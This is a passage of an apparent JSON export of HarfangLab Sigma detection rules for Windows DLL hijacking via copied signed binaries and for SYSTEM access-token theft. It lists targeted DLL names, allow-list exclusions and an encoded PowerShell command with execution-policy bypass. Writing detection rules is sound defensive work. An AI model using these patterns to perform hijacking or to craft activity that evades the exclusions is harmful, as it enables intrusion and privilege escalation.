"rule_id": "16a70c78-b3ad-445a-bef6-ca597bfdb2b3",
"rule_name": "DLL Hijacking via sppsvc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sppsvc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16ac2b82-bf41-4651-832f-0b67481cbba0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596042Z",
"creation_date": "2026-03-23T11:45:34.596046Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596053Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/incognito/incognito.c",
"https://attack.mitre.org/techniques/T1134/"
],
"name": "t1034_possible_system_access_token_theft.yml",
"content": "title: Possible SYSTEM Access Token Theft\nid: 16ac2b82-bf41-4651-832f-0b67481cbba0\ndescription: |\n Detects the suspicious creation of a process with SYSTEM privileges by a High Integrity process.\n This can be indicative of token theft from a SYSTEM process in order to locally elevate privileges.\n It is recommended to analyze the behavior and content of both the parent and the child process to search for malicious actions.\nreferences:\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/incognito/incognito.c\n - https://attack.mitre.org/techniques/T1134/\ndate: 2023/06/20\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134.001\n - attack.t1134.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n IntegrityLevel: 'System'\n ParentIntegrityLevel: 'High'\n\n exclusion_teamviewer:\n - ParentImage|endswith:\n - '?:\\ProgramData\\GenapiTV\\TeamViewer.exe'\n - '\\TeamViewer\\TeamViewer.exe'\n - '\\TeamViewerPortable\\TeamViewer.exe'\n - '\\AppData\\Local\\TeamViewer\\CustomConfigs\\\\*\\TeamViewer.exe'\n - '\\AppData\\Roaming\\TeamViewerMeeting\\TeamViewerMeeting.exe'\n - '\\AppData\\Local\\Temp\\TeamViewer\\Version?\\TeamViewer.exe'\n - '\\AppData\\Local\\Temp\\\\*\\TeamViewer\\Version?\\TeamViewer.exe'\n - ProcessParentOriginalFileName: 'TeamViewer.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'TeamViewer Germany GmbH'\n - 'TeamViewer GmbH'\n\n exclusion_mssql:\n ParentImage|endswith: '\\MSSQL\\Binn\\sqlservr.exe'\n\n exclusion_anydesk:\n - ParentImage|endswith:\n - '\\AnyDesk.exe'\n - '\\AnyDesk????.exe'\n - '\\AnyDesk_????.exe'\n - ProcessParentDescription: 'AnyDesk'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'AnyDesk Software GmbH'\n - 'philandro Software GmbH'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n\n exclusion_advanced_run:\n ParentImage|endswith: '\\AdvancedRun.exe'\n\n exclusion_prohelp:\n ParentImage:\n - '?:\\Program Files\\Mattec\\ProHelp\\bin\\moller.exe'\n - '?:\\Program Files (x86)\\Mattec\\ProHelp\\bin\\moller.exe'\n\n exclusion_etdctrl:\n ParentImage: '?:\\windows\\system32\\ETDCtrl.exe'\n\n exclusion_rg_systemes_assist:\n OriginalFileName:\n - 'RG_Supervision.exe'\n - 'Assist.exe'\n Signed: 'true'\n Signature: 'RG Systèmes SAS'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n\n exclusion_vmmem:\n ParentImage:\n - 'vmmem'\n - 'vmmemWSL'\n\n exclusion_taskkill:\n # taskkill /IM msedge.exe /F\n # taskkill /IM TDMon.exe\n CommandLine|startswith: 'taskkill /IM '\n ParentCommandLine|startswith: '?:\\Windows\\SysWOW64\\inetsrv\\w3wp.exe -ap DefaultAppPool -v '\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k iissvcs'\n\n exclusion_ninite:\n CommandLine|contains: '\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\Ninite.exe /runsetup ????????-????-????-????-????????????'\n ParentImage|endswith: '\\Ninite.exe'\n\n exclusion_dell_remote_assist:\n OriginalFileName: 'DellRemoteAssist.exe'\n Signed: 'true'\n ProcessParentOriginalFileName: 'DellRemoteAssist.exe'\n ProcessParentSigned: 'true'\n CommandLine|contains:\n - 'startup=runSystem'\n - 'startup=runElevated'\n - 'startup=systemBaseClient'\n\n exclusion_securityhealthsetup:\n ProcessImage: '?:\\Windows\\SoftwareDistribution\\Download\\Install\\securityhealthsetup.exe'\n Signed: 'true'\n\n exclusion_rustdeck1:\n OriginalFileName: 'rustdesk.exe'\n CommandLine|contains: ' --run-as-system'\n\n exclusion_rustdeck2:\n OriginalFileName: 'rustdesk.exe'\n Signed: 'true'\n Signature: 'Zhou Huabing'\n\n # https://www.navista.fr/support-technique/\n exclusion_navista:\n OriginalFileName: 'rustdesk.exe'\n Signed: 'true'\n Signature: 'PURSLANE'\n\n exclusion_ansible:\n CommandLine: 'powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand CgAgACAAIAAgACYAYwBoAGMAcAAuAGMAbwBtACAANgA1ADAAMAAxACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQAKACAAIAAgACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAIAA9ACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByAC4AUwBwAGwAaQB0ACgAQAAoACIAYAAwAGAAMABgADAAYAAwACIAKQAsACAAMgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBSAGUAbQBvAHYAZQBFAG0AcAB0AHkARQBuAHQAcgBpAGUAcwApAAoAIAAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAGoAcwBvAG4AXwByAGEAdwAgAC0AVgBhAGwAdQBlACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAWwAxAF0ACgAgACAAIAAgACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAIAAgACAAIAAmACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIACgA='\n\n exclusion_paragon:\n ProcessImage: '?:\\Program Files\\Paragon Software\\Paragon Backup and Recovery\\program\\hdmengine_scriptsapp.exe'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16ac2b82-bf41-4651-832f-0b67481cbba0",
"rule_name": "Possible SYSTEM Access Token Theft",
"rule_description": "Detects the suspicious creation of a process with SYSTEM privileges by a High Integrity process.\nThis can be indicative of token theft from a SYSTEM process in order to locally elevate privileges.\nIt is recommended to analyze the behavior and content of both the parent and the child process to search for malicious actions.\n",
"rule_creation_date": "2023-06-20",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1134.001",
"attack.t1134.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16bd5dca-1018-431d-b375-f0bec118e825",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077520Z",
"creation_date": "2026-03-23T11:45:34.077522Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077527Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_appvshnotify.yml",
"content": "title: DLL Hijacking via AppVShNotify.exe\nid: 16bd5dca-1018-431d-b375-f0bec118e825\ndescription: |\n Detects potential Windows DLL Hijacking via AppVShNotify.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'AppVShNotify.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16bd5dca-1018-431d-b375-f0bec118e825",
"rule_name": "DLL Hijacking via AppVShNotify.exe",
"rule_description": "Detects potential Windows DLL Hijacking via AppVShNotify.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16c5e5af-a716-4159-bbc4-d614187f5564",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590369Z",
"creation_date": "2026-03-23T11:45:34.590373Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590383Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dpiscaling.yml",
"content": "title: DLL Hijacking via dpiscaling.exe\nid: 16c5e5af-a716-4159-bbc4-d614187f5564\ndescription: |\n Detects potential Windows DLL Hijacking via dpiscaling.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dpiscaling.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\iphlpapi.dll'\n - '\\ndfapi.dll'\n - '\\PROPSYS.dll'\n - '\\shell32.dll'\n - '\\wdi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16c5e5af-a716-4159-bbc4-d614187f5564",
"rule_name": "DLL Hijacking via dpiscaling.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dpiscaling.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16d32dde-ef35-4e0e-91a8-466d49409ba8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075187Z",
"creation_date": "2026-03-23T11:45:34.075189Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075194Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wlbs.yml",
"content": "title: DLL Hijacking via WLBS.exe\nid: 16d32dde-ef35-4e0e-91a8-466d49409ba8\ndescription: |\n Detects potential Windows DLL Hijacking via WLBS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WLBS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16d32dde-ef35-4e0e-91a8-466d49409ba8",
"rule_name": "DLL Hijacking via WLBS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WLBS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16e0ffc8-8668-4969-8fe3-840080ccc099",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587639Z",
"creation_date": "2026-03-23T11:45:34.587643Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587650Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bootcfg.yml",
"content": "title: DLL Hijacking via bootcfg.exe\nid: 16e0ffc8-8668-4969-8fe3-840080ccc099\ndescription: |\n Detects potential Windows DLL Hijacking via bootcfg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bootcfg.exe'\n ImageLoaded|endswith:\n - '\\mpr.dll'\n - '\\netapi32.dll'\n - '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16e0ffc8-8668-4969-8fe3-840080ccc099",
"rule_name": "DLL Hijacking via bootcfg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bootcfg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "171739c5-ffb8-48b2-8e6d-e688af5f311b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587540Z",
"creation_date": "2026-03-23T11:45:34.587544Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587552Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msinfo32.yml",
"content": "title: DLL Hijacking via msinfo32.exe\nid: 171739c5-ffb8-48b2-8e6d-e688af5f311b\ndescription: |\n Detects potential Windows DLL Hijacking via msinfo32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msinfo32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\fastprox.dll'\n - '\\mfc42u.dll'\n - '\\powrprof.dll'\n - '\\SLC.dll'\n - '\\sppc.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "171739c5-ffb8-48b2-8e6d-e688af5f311b",
"rule_name": "DLL Hijacking via msinfo32.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msinfo32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "17d344bd-5969-438e-b896-775f30a96618",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603629Z",
"creation_date": "2026-03-23T11:45:34.603632Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603639Z",
